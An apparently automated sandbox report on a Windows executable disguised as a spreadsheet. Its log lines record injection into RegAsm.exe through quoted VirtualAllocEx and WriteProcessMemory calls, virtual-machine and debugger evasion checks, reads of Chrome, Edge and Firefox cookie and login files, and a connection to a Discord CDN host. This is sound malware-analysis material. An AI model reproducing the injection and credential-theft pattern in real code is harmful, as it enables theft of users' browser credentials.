Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Memory allocated: 2AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Memory allocated: 2B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2605			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 7249			Jump to behavior

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe TID: 6860	Thread sleep count: 328 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe TID: 6832	Thread sleep count: 155 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe TID: 6744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5440	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll="
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1783472169.00000000010E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Windows Analysis Report rDoc5633276235623657_xls.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
rDoc5633276235623657_xls.exe

Malware Threat Intel
Provided by

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior

Source: rDoc5633276235623657_xls.exe, Program.cs	Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: rDoc5633276235623657_xls.exe, Program.cs	Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
Source: rDoc5633276235623657_xls.exe, Program.cs	Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40A000	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000	Jump to behavior
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D24008	Jump to behavior

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Queries volume information: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Source: Yara match	File source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR

Source: Yara match	File source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rDoc5633276235623657_xls.exe PID: 6696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.135.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false
